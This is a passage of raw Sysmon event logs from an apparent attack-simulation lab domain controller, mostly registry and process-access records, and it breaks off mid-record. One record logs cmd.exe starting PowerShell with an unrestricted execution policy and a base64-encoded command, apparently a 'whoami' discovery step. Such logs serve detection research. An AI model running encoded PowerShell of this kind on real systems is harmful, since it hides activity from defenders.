(0x000004b0) 13241300x80000000000000002854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:21.414{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000002853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:21.414{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000002852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:21.414{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000002851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:21.414{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000002850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:21.414{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000002849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:21.414{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000002848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:21.414{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-250 13241300x80000000000000002847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:21.414{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 10341000x80000000000000002984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.976{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-42BE-6000-8D00-000000009A01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.976{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-42BE-6000-8D00-000000009A01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.945{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.945{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.929{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.929{08A6967A-42BE-6000-8D00-000000009A01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qaoq1m53.330.ps12021-01-14 13:10:22.929 10341000x80000000000000002978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.914{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-42BE-6000-8D00-000000009A01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-42BE-6000-8B00-000000009A01}50325052C:\Windows\system32\conhost.exe{08A6967A-42BE-6000-8D00-000000009A01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-42BE-6000-8D00-000000009A01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-42BE-6000-8C00-000000009A01}51045108C:\Windows\system32\cmd.exe{08A6967A-42BE-6000-8D00-000000009A01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.894{08A6967A-42BE-6000-8D00-000000009A01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-42BE-6000-B81C-090000000000}0x91cb80HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-42BE-6000-8C00-000000009A01}5104C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000002964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-42BE-6000-8B00-000000009A01}50325052C:\Windows\system32\conhost.exe{08A6967A-42BE-6000-8C00-000000009A01}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 